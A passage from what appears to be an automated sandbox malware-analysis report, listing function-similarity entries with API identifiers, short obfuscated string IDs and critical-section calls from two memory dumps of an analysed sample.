                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: G@ZK$[@G_
                        • API String ID: 4132704954-2338778587
                        APIs
                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                        • __Init_thread_footer.LIBCMT ref: 04938155
                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: G@ZK$[@G_
                        • API String ID: 4132704954-2338778587
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 00407899
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: @G@K$A@K.
                        • API String ID: 2296764815-2457859030
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 004079A9
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: @G@K$ZYA.
                        • API String ID: 2296764815-4236202813
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 00406E39
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: ZF\K$three
                        • API String ID: 2296764815-3094064056
                        APIs
                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                        • __Init_thread_footer.LIBCMT ref: 049370A0
                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: ZF\KK.$three
                        • API String ID: 4132704954-2602870784
                        APIs
                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                        • __Init_thread_footer.LIBCMT ref: 04937B00
                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: @G@K$A@K.
                        • API String ID: 4132704954-2457859030
                        APIs
                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                        • __Init_thread_footer.LIBCMT ref: 04937C10
                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: @G@K$ZYA.
                        • API String ID: 4132704954-4236202813
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 00406C99
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: CGV.$mix
                        • API String ID: 2296764815-1644454629
                        APIs
                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                        • __Init_thread_footer.LIBCMT ref: 04936F00
                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: CGV.$mix
                        • API String ID: 4132704954-1644454629